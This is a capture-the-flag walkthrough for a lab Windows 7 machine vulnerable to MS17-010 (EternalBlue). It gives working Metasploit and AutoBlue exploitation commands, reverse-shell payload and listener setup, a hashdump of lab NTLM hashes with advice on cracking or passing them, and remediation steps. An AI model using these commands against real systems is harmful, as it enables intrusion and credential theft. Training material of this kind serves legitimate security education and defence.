Target IP: blue.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User, Root (System) access.
1. Executive Summary
“Blue” is a legacy Windows machine (likely Windows 7 or Server 2008 R2) vulnerable to MS17-010 (EternalBlue). This is a critical buffer overflow vulnerability in the Microsoft Server Message Block (SMBv1) protocol. Exploitation leads directly to NT AUTHORITY\SYSTEM (highest privilege) without requiring valid credentials or user interaction.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap vulnerability scanning (
--script smb-vuln-ms17-010). - T1210 (Exploitation of Remote Services): Leveraging MS17-010 to execute code via SMB.
- T1569 (System Services): Creating a malicious service to persist or execute commands.
- T1003 (OS Credential Dumping): Extracting hashes via hashdump (Post-Exploitation).
2. Operational Setup
Host Configuration
echo "10.10.x.x blue.thm" | sudo tee -a /etc/hostsWorkspace
- Pane 1: Nmap / Metasploit.
- Pane 2: Manual Exploit (Optional).
3. Enumeration: “What do we see?”
A. Network Scanning
We scan for open ports and specifically check for SMB vulnerabilities.
nmap -sC -sV --script smb-vuln-ms17-010 -p 139,445 -oA nmap/blue blue.thmResults:
- 139/445 (SMB): Windows 7 Professional 7601 Service Pack 1.
- Vulnerability Check:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGHB. Vulnerability Analysis: EternalBlue
What is it?
MS17-010 exploits a buffer overflow in the Srv!SrvOs2FeaToNt function in the Windows SMB driver (srv.sys). By sending a specially crafted packet, an attacker can overwrite kernel memory, allowing them to inject shellcode that runs with Kernel privileges.
4. Exploitation: The Metasploit Way (What you did)
This is the “Push Button” method.
- Search:
search eternalblueorsearch ms17-010. - Select Module:
use exploit/windows/smb/ms17_010_eternalblue.
- Note: Do not use
ms17_010_psexecunless you have credentials.eternalblueis the exploit for unauthenticated access.
- Configure:
set RHOSTS blue.thm
set LHOST tun0
set payload windows/x64/meterpreter/reverse_tcp
run- Result: You get a Meterpreter shell as
NT AUTHORITY\SYSTEM.
5. Exploitation: The Manual Way (The Professional Way)
Why learn this? If Metasploit is banned (OSCP) or fails, you need this.
A. The Tool: AutoBlue
Clone the AutoBlue repository (a reliable wrapper for the original exploit).
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010B. Shellcode Generation
The exploit needs to know where to send the shell. The script helps generate this shellcode.
./shell_prep.sh
# Enter LHOST: 10.10.x.x
# Enter LPORT: 4444
# Type: 1 (Reverse Meterpreter or regular cmd shell)This creates a sc_x64.bin.
C. Execution
- Listener: Start
nc -lvnp 4444. - Exploit:
# python zzz_exploit.py <TARGET_IP> <PIPE_NAME>
python3 zzz_exploit.py 10.10.x.x samrNote: We often use the samr or browser pipe if we don’t have credentials.
Result: A raw command shell as System.
6. Post-Exploitation
Since we are System, we own the box.
A. Flag Retrieval
- User Flag:
type C:\Users\Jon\Documents\flag1.txt(or similar location). - Root Flag:
type C:\Windows\System32\config\flag3.txt.
B. Credential Dumping (Hashdump)
In Metasploit:
hashdumpOutput:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8b57f8cf:::You can now crack these NTLM hashes using Hashcat (-m 1000) or pass-the-hash.
7. Remediation (Blue Team)
- Patch Immediately: Apply Microsoft Security Bulletin MS17-010 (released March 2017).
- Disable SMBv1: SMBv1 is insecure and obsolete.
- PowerShell:
Set-SmbServerConfiguration -EnableSMB1Protocol $false
- Firewalling: Block port 445 (SMB) from the internet. It should only be accessible over VPN or internal LAN.